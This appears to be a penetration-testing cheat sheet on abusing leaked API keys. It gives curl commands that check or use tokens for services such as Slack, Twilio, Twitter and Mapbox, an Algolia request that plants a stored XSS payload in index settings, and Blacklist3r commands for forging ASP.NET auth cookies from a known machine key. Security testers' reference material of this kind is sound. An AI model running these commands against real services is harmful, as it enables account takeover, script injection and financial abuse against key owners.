Api Key Leaks
Post
Cancel

Api Key Leaks

API Key Leaks

The API key is a unique identifier that is used to authenticate requests associated with your project. Some developers might hardcode them or leave it on public shares.

Summary

Tools

Exploit

The following commands can be used to takeover accounts or extract personal information from the API using the leaked token.

Google Maps

Use : https://github.com/ozguralp/gmapsapiscanner/

Impact:

  • Consuming the company’s monthly quota or can over-bill with unauthorized usage of this service and do financial damage to the company
  • Conduct a denial of service attack specific to the service if any limitation of maximum bill control settings exist in the Google account

Algolia

1
2
3
4
5
6
curl --request PUT \
  --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings \
  --header 'content-type: application/json' \
  --header 'x-algolia-api-key: <example-key>' \
  --header 'x-algolia-application-id: <example-application-id>' \
  --data '{"highlightPreTag": "<script>alert(1);</script>"}'

Slack API Token

1
curl -sX POST "https://slack.com/api/auth.test?token=xoxp-TOKEN_HERE&pretty=1"

Facebook Access Token

1
curl https://developers.facebook.com/tools/debug/accesstoken/?access_token=ACCESS_TOKEN_HERE&version=v3.2

Github client id and client secret

1
curl 'https://api.github.com/users/whatever?client_id=xxxx&client_secret=yyyy'

Twilio Account_sid and Auth token

1
curl -X GET 'https://api.twilio.com/2010-04-01/Accounts.json' -u ACCOUNT_SID:AUTH_TOKEN

Twitter API Secret

1
curl -u 'API key:API secret key' --data 'grant_type=client_credentials' 'https://api.twitter.com/oauth2/token'

Twitter Bearer Token

1
curl --request GET --url https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json --header 'authorization: Bearer TOKEN'

Gitlab Personal Access Token

1
curl "https://gitlab.example.com/api/v4/projects?private_token=<your_access_token>"

HockeyApp API Token

1
curl -H "X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c" https://rink.hockeyapp.net/api/2/apps/2021bdf2671ab09174c1de5ad147ea2ba4

Auth Bypass using pre-published Machine Key

By default, ASP.NET creates a Forms Authentication Ticket with unique a username associated with it, Date and Time at which the ticket was issued and expires. So, all you need is just a unique username and a machine key to create a forms authentication token

That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.

Example of a machineKey from https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication.

1
<machineKey validationKey="87AC8F432C8DB844A4EFD024301AC1AB5808BEE9D1870689B63794D33EE3B55CDB315BB480721A107187561F388C6BEF5B623BF31E2E725FC3F3F71A32BA5DFC" decryptionKey="E001A307CCC8B1ADEA2C55B1246CDCFE8579576997FF92E7" validation="SHA1" />

Exploit with Blacklist3r

1
2
3
4
5
# decrypt cookie
$ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX --decrypt --purpose=owin.cookie --valalgo=hmacsha512 --decalgo=aes

# encrypt cookie (edit Decrypted.txt)
$ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt

Mapbox API Token

A Mapbox API Token is a JSON Web Token (JWT). If the header of the JWT is sk, jackpot. If it’s pk or tk, it’s not worth your time.

1
2
3
4
5
#Check token validity
curl "https://api.mapbox.com/tokens/v2?access_token=YOUR_MAPBOX_ACCESS_TOKEN"

#Get list of all tokens associated with an account. (only works if the token is a Secret Token (sk), and has the appropiate scope)
curl "https://api.mapbox.com/tokens/v2/MAPBOX_USERNAME_HERE?access_token=YOUR_MAPBOX_ACCESS_TOKEN"

References

This post is licensed under CC BY 4.0 by the author.